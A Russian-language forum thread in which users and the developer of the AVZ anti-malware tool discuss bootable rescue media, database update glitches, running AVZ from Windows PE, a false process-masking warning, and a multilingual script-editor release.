В статии размышления  :Smiley:  Я попробовал создать загрузочную флешку/CD, в принципе все получается неплохо ... но образ по размеру получается не такой уж и маленький. Поэтому сейчас задача номер 1 в размешлениях - как получить минимальный размер образа для такого загрузочного носителя

----------


## Биомеханик

Навенрое Linux поможет. Он маленький. Можно попробовать на win 98 сильно урезаном. http://4pda.ru/forum/attach/794398/MINI98.rar Ой, он NTFS не видит, но я видел патч какой-то. Да вот же он http://freeware32.ru/index.php?name=...98&program=100

----------


## Зайцев Олег

> Навенрое Linux поможет. Он маленький. Можно попробовать на win 98 сильно урезаном. http://4pda.ru/forum/attach/794398/MINI98.rar Ой, он NTFS не видит, но я видел патч какой-то. Да вот же он http://freeware32.ru/index.php?name=...98&program=100


Для NTFS у меня есть собственный "драйвер", позволяющий работать с NTFS томом напрямую, в режиме "только чтение" это не опасно. Но с урезанным Windows я затеваться не хочу - полученный "миниWindows" нельзя положить никудя для публичного доступа, так как его распространение будет нарушением лицензии

----------


## Биомеханик

Выходит либо linux либо Windows PE?

----------


## Зайцев Олег

> Выходит либо linux либо Windows PE?


Да, именно так. Причем с Windows PE я не знаю лицензионной политики, можно что-то делать на его базе или нет. С Linux в этом плане проще, но в остальном - сложнее. С другой стороны, под Linux задумывается сильно урезанный AVZ, по сути интерпретатор скрипта для того, чтобы можно было загрузиться и выполнить скрипт удаления и карантина трудноубиваемой заразы

----------


## Синауридзе Александр

> С другой стороны, под Linux задумывается сильно урезанный AVZ, по сути интерпретатор скрипта для того, чтобы можно было загрузиться и выполнить скрипт удаления и карантина трудноубиваемой заразы


Так это нам и надо. :Smiley:

----------


## Биомеханик

А логи как он будет снимать из линукса?

*Добавлено через 5 минут*

Кто с трафиком? Поройтесь тут ftp://ftp.kernel.org/pub/linux/utils/boot/syslinux/

*Добавлено через 1 минуту*

И ещё вот эту прогу http://www.prime-expert.com/flashboot/
http://rapidshare.com/files/29372805...7_portable.rar

----------


## PavelA

http://technet.microsoft.com/ru-ru/m.../cc137812.aspx - статейка про winPE



> Windows PE 2.0 — это бесплатный компонент пакета автоматический установки Windows для всех лицензий Windows. Эта лицензия применяется не только для развертывания, но также для использования Windows PE для целей восстановления и устранения неисправностей.

----------


## Биомеханик

Для Windows PE нужен дистрибутив windows/ А если у пользователя его нет. И как он будет нго создавать на неработающем компьютере. И как туда вшить AVZ? Как оформить?
Вот FlashBoot как я понял может взять за основу файлы уже установленной ОС (отподает вопрос с лицензией).




> Работа в этой программе устроена по принципу «Помощника»: «Раз! Два! Три! Готово!» 
>   Вам потребуется только вставить флэшку в USB-разьем, а системный CD-диск или дискетку — в дисковод, запустить программу и следовать инструкциям на экране. К тому же, «FlashBoot» умеет конвертировать загрузочные BartPE-диски или обычные загрузочные CD в загрузочные Flash-диски, конвертировать для этой же цели загрузочные DOS/Linux диски, создавать загрузочные USB Flash-диски с имидж-образов дискет. Это, так сказать, для лентяев. Но есть у программы и уникальные возможности, такие, как создание flash-диска для восстановления паролей Windows NT/2000/XP, создание загрузчика Windows NT/2000/XP, дублирование загрузочных USB Flash-дисков и создание их файлов-образов. 
>   Все, что вам нужно будет сделать, это выбрать в едином окне один из вышеприведенных вариантов действий, при необходимости, указать источник системных файлов или образ диска, выбрать USB-диск из списка дисков и выбрать тип диска: «Partitioned disk» — для загрузки как USB-HDD или «Superfloppy» — для загрузки как USB-ZIP.  
> Остается только посетовать, что обе программы идут только под Windows 2000/XP. Удачной вам загрузки.

----------


## АлександрУ

с 19-го по 21-ее число нет обновлений базы АВЗ?
Перевелись вирусы?

----------


## Groft

> с 19-го по 21-ее число нет обновлений базы АВЗ?
> Перевелись вирусы?


Дайте человеку отдохнуть  :Wink:

----------


## АлександрУ

КасперЛабу или Олегу?

----------


## Зайцев Олег

> с 19-го по 21-ее число нет обновлений базы АВЗ?
> Перевелись вирусы?


Нет обновлений где ? На сайте лежит база за 20.03, вчера лежала за 19.03 и т.п. - по показаниям приборов она выходит ежедневно. Просто я стараюсь обновлять ее вечером, а не утром - тогда нагрузка на сайт менбше и глюков соответственно меньше

----------


## AStr

Только сейчас обновился - "обновления баз не требуется"

последнее обновление вот это:

м    Имя      │ Размер │  Дата
main040    avz│   28723│19.03.08

----------


## Зайцев Олег

> Только сейчас обновился - "обновления баз не требуется"
> 
> последнее обновление вот это:
> 
> м Имя │ Размер │ Дата
> main040 avz│ 28723│19.03.08


Это очень плохо - похоже main040 "залип" и не обновляется. Сейчас вручную вычищу FTP папки и прогоню обновление еще раз - через минут 10 есть просьба - нужно еще раз запустить апдейт и посмотреть, притащит он main040 или нет. Правильный файл имеет размер 33797 байта.
Обновление завершено, можно пробовать

----------


## VV2006

Теперь обновляется Ok. Спасибо.

----------


## tar

если я что-то отсылаю на newvirus СОБАКА z-oleg.com, то должен ли приходить ответ какой-то?
А то пару раз отсылал подозрительные файлы, но после обновлений AVZ реагирует на эти файлы без изменений

----------


## PavelA

> Для Windows PE нужен дистрибутив windows/ А если у пользователя его нет. И как он будет нго создавать на неработающем компьютере. И как туда вшить AVZ? Как оформить?
> Вот FlashBoot как я понял может взять за основу файлы уже установленной ОС (отподает вопрос с лицензией).


FlashBoot - отдельная, причем платная вещь.

Win PE - встроена в систему. ИМХО пользователь не должен создавать сам образ с АВЗ. Он просто будет его закачивать из Инета. Если поискать, то уже сейчас лежит в Инете несколько образов Win PE с нужными утилитами.

http://www.bousoft.com/winpe.php - здесь ее продают за 200руб.
Это не реклама и я ее не продаю.

----------


## Зайцев Олег

> если я что-то отсылаю на newvirus СОБАКА z-oleg.com, то должен ли приходить ответ какой-то?
> А то пару раз отсылал подозрительные файлы, но после обновлений AVZ реагирует на эти файлы без изменений


У моего хостера дикая защита стоит, многое рубится (а менять хостера я не хочу, так как мало кто будет терпеть измеряемый терабайтами трафик). Можно прислать мне файлы через форму на сайте, там все доходит, но оно падает в очередь анализатора и может лежать там долго ...

----------


## VV2006

Для работы AVZ из-под Windows Preinstallation Environment(WinPE) и BartPE LiveCD удобно использовать RunScanner (http://www.paraglidernc.com/plugins/runscanner.htm). Причём, можно сделать плагин, а можно просто выполнить команду RunScanner.exe /y /t 0 avz.exe для работы на целевой (удалённой=уделанной) системе. Всё, что должно работать для неактивной системы, работает, только не нужно забывать о регистрации необходимых библиотек (autorun0_runscanner.cmd) и размещении в каталоге AVZ файлов: RunScanner.exe, RunScannerDLL.dll (или указании пути к ним в переменных).
Испытывалось при загрузке WindowsXPE с Flash-брелока, вариант с загрузочным CD (DVD), судя по всему, тоже будет работать, но с небольшими неудобствами: сохранять логи и запускать AVZ c актуальными базами придётся на другом (перезаписываемом) носителе.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## psw

В процессе сканирования AVZ выдал предупреждение о маскировке процесса по всем выполняемым процессам, включая свой собственный



> >> Опасно ! Обнаружена маскировка процессов
> >>>> Обнаружена маскировка процесса 4 System.exe
> >>>> Обнаружена маскировка процесса 456 C:\WINDOWS\system32\smss.exe
> >>>> Обнаружена маскировка процесса 496 C:\WINDOWS\system32\csrss.exe
> >>>> Обнаружена маскировка процесса 524 C:\WINDOWS\system32\winlogon.exe
> >>>> Обнаружена маскировка процесса 568 C:\WINDOWS\system32\services.exe
> >>>> Обнаружена маскировка процесса 580 C:\WINDOWS\system32\lsass.exe
> >>>> Обнаружена маскировка процесса 724 C:\WINDOWS\system32\ati2evxx.exe
> >>>> Обнаружена маскировка процесса 736 C:\WINDOWS\system32\svchost.exe
> ...


Вопросов, собственно, да: а) что бы это могло значить; и б) как это можно побороть?

----------


## Зайцев Олег

> В процессе сканирования AVZ выдал предупреждение о маскировке процесса по всем выполняемым процессам, включая свой собственный
> 
> 
> Вопросов, собственно, да: а) что бы это могло значить; и б) как это можно побороть?


Это очень странно ... я бы советовал:
1. перезагрузиться и повторить опыт
2. Если ситуация повторится, то стоит сделать логи и поискать причину

Причин много - начиная от зловреда и заканчивая проактивкой, которая блокирует работу AVZ

----------


## psw

Проактивки там нет, но есть \Windows\System32\alcop.sys, служба которого (alcop - alcop server) не желает удаляться ни под каким видом. Это может быть причиной?

----------


## drongo

psw- делайте логи-  :Wink:  http://www.incodesolutions.com/threa...otalcopsys.php

----------


## psw

Да если б это было у меня...
У меня есть: 
а) набор логов HJT и AVZ, где такого поведения еще нет
б) скрипт AVZ, который был выполнен
в) набор логов после выполнения скрипта, где такое поведение проявилось и ведет себя устойчиво: сохраняется после перезагрузок и проч.

----------


## anton_dr

Олег, планируется что-то делать с этим?



> Справка для этой программы была создана в формате справки Windows, который использовался в предыдущих версиях Windows и не поддерживается в Windows Vista.

----------


## Зайцев Олег

> Олег, планируется что-то делать с этим?


Для начала посмотрю, действительно ли она не поддерживается на висте. Если да, то несложно перейти на CHM справку, или выпустить отдельный вариант документации в PDF формате. Оба этих решения тривиальны ...

----------


## tar

мне не совсем понятна ситуация с ревизором. Он у всех не работает? Если да, то будут ли в ближайшее время исправления?

----------


## Зайцев Олег

> мне не совсем понятна ситуация с ревизором. Он у всех не работает? Если да, то будут ли в ближайшее время исправления?


Очень скоро выйдет новый релиз, там все исправлено (расчетная дата - эти выходные)

----------


## Биомеханик

Круто, спасибо.

----------


## Биомеханик

А куда Олег пропал? В KIS 8 уже ноновведения добавили, а релиза нет.

----------


## Макcим

Что случилось с обновлением базы безопасных? Последнее выходило 16 марта.

----------


## Rene-gad

Общий привет,
скажите, люди добрые, планируется выпуск версии радактора скриптов для нерусских систем? У меня одни *???????????????????* на всех кнопках....

----------


## Зайцев Олег

> Общий привет,
> скажите, люди добрые, планируется выпуск версии радактора скриптов для нерусских систем? У меня одни *???????????????????* на всех кнопках....


Планируется - такая версия выйдет через 60 секунд (т.е. она уже вышла, но на сайте в процессе формирования анонс и ссылки). Через 1-2 минуты можно качать

----------


## Макcим

Можно узнать список изменений?

----------


## Зайцев Олег

> Можно узнать список изменений?


Мультиязычный интерфейс, поддержка всех новых команд скрипт-языка до версии 4.30 включительно

----------


## Stec

Дайте пожалуйста адрес, где качать последнюю версию, Здесь http://z-oleg.com/secur/avz/download.php 4.29.09 от 12.12.07 в правилах тоже.

----------


## Jef239

Ты не понял, обновился только редактор скриптов. http://z-oleg.com/avz_se.zip

----------


## Rene-gad

> Планируется - такая версия выйдет через 60 секунд


Спасибо. Надо было мне месяца на 3 раньше спросить  :Wink: 
Хорошо бы еще узнать, что тут от непосвященных сокрыто  :Roll Eyes (Sarcastic):

----------


## Зайцев Олег

> Спасибо. Надо было мне месяца на 3 раньше спросить 
> Хорошо бы еще узнать, что тут от непосвященных сокрыто


Это криволокализованный Windows ... (у меня к примеру в W2K3 английской все отлично работает, равно как на XP SP2). Нужно задать lang=en в параметрах и работать полностью в англоязычном варианте - там все будет нормально.
--------
Темы закрываю, в связи с выходом версии 4.30 - см. http://virusinfo.info/showthread.php?p=211746

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------

